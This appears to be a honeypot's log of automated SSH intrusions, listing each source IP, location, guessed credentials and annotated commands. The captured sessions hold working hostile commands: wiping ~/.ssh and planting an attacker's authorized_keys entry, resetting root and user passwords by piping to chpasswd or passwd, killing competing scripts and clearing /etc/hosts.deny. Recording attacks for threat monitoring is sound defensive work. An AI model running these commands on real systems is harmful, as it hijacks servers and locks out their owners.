$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo "root:hIvshAce8cI0"|chpasswd|bash
$ echo "root:hAiUvh3lv8J9"|chpasswd|bash
$ echo -e "1234\nDJ8heqoxJjnR\nDJ8heqoxJjnR"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nDJ8heqoxJjnR\nDJ8heqoxJjnR\n"|passwd
$ echo "root:00DZtSW46Npm"|chpasswd|bash
$ echo "root:wyChZSeBiGXu"|chpasswd|bash
🎭 liberty_root_22 (209.38.68.31) β€” Santa Clara, United States Β· 2 sessions Β· 22 cmds
2026-05-25 05:26 EDT Β· as curl/welltech12, mega/mega
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mega\n9ZwPZK9Hjl2d\n9ZwPZK9Hjl2d"|passwd|bash
$ Enter new UNIX password:
$ echo "mega\n9ZwPZK9Hjl2d\n9ZwPZK9Hjl2d\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_32 (87.99.131.110) β€” Ashburn, United States Β· 1 session Β· 19 cmds
2026-05-25 12:13 EDT Β· as root/vps2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:unI023Q69kuG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_9 (64.227.176.23) β€” Bengaluru, India Β· 1 session Β· 19 cmds
2026-05-25 12:04 EDT Β· as root/qwert12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EwJkkuMJKc58"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bistro_root_5 (89.116.31.97) β€” Lauterbourg, France Β· 1 session Β· 20 cmds
2026-05-25 11:56 EDT Β· as ftp2/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\nRNibjjpPfKLW\nRNibjjpPfKLW"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nRNibjjpPfKLW\nRNibjjpPfKLW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 scone_root_6 (37.143.61.16) β€” City of London, United Kingdom Β· 1 session Β· 19 cmds
2026-05-25 11:51 EDT Β· as root/Abc123456$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:X2UhooYIIQlq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_52 (43.134.125.191) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-25 11:38 EDT Β· as root/12345Qwe
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:sGAu4sVlGDNs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_33 (185.92.182.129) β€” Kansas City, United States Β· 1 session Β· 19 cmds
2026-05-25 09:45 EDT Β· as root/123456qw
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EOnUUiv0hlyQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_35 (107.0.200.227) β€” Lafayette, United States Β· 1 session Β· 20 cmds
2026-05-25 09:44 EDT Β· as newuser/password123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password123\nGIF1KdQUvtDZ\nGIF1KdQUvtDZ"|passwd|bash
$ Enter new UNIX password:
$ echo "password123\nGIF1KdQUvtDZ\nGIF1KdQUvtDZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 viking_root_4 (171.25.158.70) β€” Vaxjo, Sweden Β· 1 session Β· 19 cmds
2026-05-25 09:39 EDT Β· as root/123456789@Ab
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ErnVBeQykV81"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_64 (196.189.51.146) β€” Addis Ababa, Ethiopia Β· 1 session Β· 20 cmds
2026-05-25 09:18 EDT Β· as tester/tester
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "tester\nDjJsy9QIgByQ\nDjJsy9QIgByQ"|passwd|bash
$ Enter new UNIX password:
$ echo "tester\nDjJsy9QIgByQ\nDjJsy9QIgByQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_60 (213.135.175.76) β€” Prilep, North Macedonia Β· 1 session Β· 19 cmds
2026-05-25 09:04 EDT Β· as root/password1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:NHSXtLiFKSf5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_59 (42.96.20.16) β€” Hanoi, Vietnam Β· 1 session Β· 20 cmds
2026-05-25 09:01 EDT Β· as ubuntu/1234qwer
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234qwer\nsf9RQPrtxMt1\nsf9RQPrtxMt1"|passwd|bash
$ Enter new UNIX password:
$ echo "1234qwer\nsf9RQPrtxMt1\nsf9RQPrtxMt1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tiger_root_11 (43.228.112.254) β€” Raipur, India Β· 2 sessions Β· 40 cmds
2026-05-25 08:37 EDT Β· as curl/welltech12, ubuntu/asdfghjkl
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "asdfghjkl\n5obe4GKjyqAN\n5obe4GKjyqAN"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "asdfghjkl\n5obe4GKjyqAN\n5obe4GKjyqAN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "welltech12\nxyjUKhn1G8wC\nxyjUKhn1G8wC"|passwd|bash
$ echo "welltech12\nxyjUKhn1G8wC\nxyjUKhn1G8wC\n"|passwd
🎭 phantom_root_60 (200.77.172.159) β€” CuauhtΓ©moc, Mexico Β· 1 session Β· 19 cmds
2026-05-25 08:56 EDT Β· as root/Huawei12#$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EidJ72CwxTsf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_65 (154.221.23.232) β€” Chai Wan, Hong Kong Β· 1 session Β· 20 cmds
2026-05-25 08:48 EDT Β· as ubuntu/asdfghjkl
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
